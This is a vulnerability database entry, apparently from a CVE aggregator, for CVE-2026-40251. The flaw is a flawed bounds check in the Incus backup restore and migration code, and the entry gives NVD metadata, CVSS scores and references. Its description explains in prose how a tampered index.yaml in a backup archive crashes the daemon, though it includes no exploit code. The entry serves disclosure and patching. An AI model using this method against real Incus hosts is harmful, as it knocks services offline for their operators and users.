  ],
  "summary": "Incus Vulnerable to Panic via Snapshot Bounds Check"
}

FKIE_CVE-2026-40251

Vulnerability from fkie_nvd - Published: 2026-05-06 21:16 - Updated: 2026-05-07 17:06

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go	Product
security-advisories@github.com	https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	linuxcontainers	incus	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF8EBB4B-C1F0-44C5-B063-9CF8EB6E0972",
              "versionEndExcluding": "7.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The backup restore subsystem contains an out-of-bounds panic vulnerability caused by an invalid bounds check when indexing snapshot metadata arrays, and the same flawed pattern also appears in the migration path. When iterating through physical snapshots provided in a backup archive, the loop uses the index to look up corresponding metadata in the parsed `Config.Snapshots` and `Config.VolumeSnapshots` slices. The guard condition `len(slice) \u003e= i-1` is incorrect because it can still evaluate to true when the subsequent slice[i] access is out of bounds.\n\nAn attacker can submit a backup archive that contains physical snapshot directories while supplying a tampered `index.yaml` with an empty or truncated snapshot metadata array, causing the daemon to index beyond the end of the metadata slice and crash. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0."
    }
  ],
  "id": "CVE-2026-40251",
  "lastModified": "2026-05-07T17:06:42.753",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-06T21:16:01.210",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/lxc/incus/security/advisories/GHSA-4m88-wxj4-9qj6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-129"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40251 (GCVE-0-2026-40251)

GHSA-4M88-WXJ4-9QJ6

Summary

Details

PoC

Credit

FKIE_CVE-2026-40251

Tags

Sightings

Nomenclature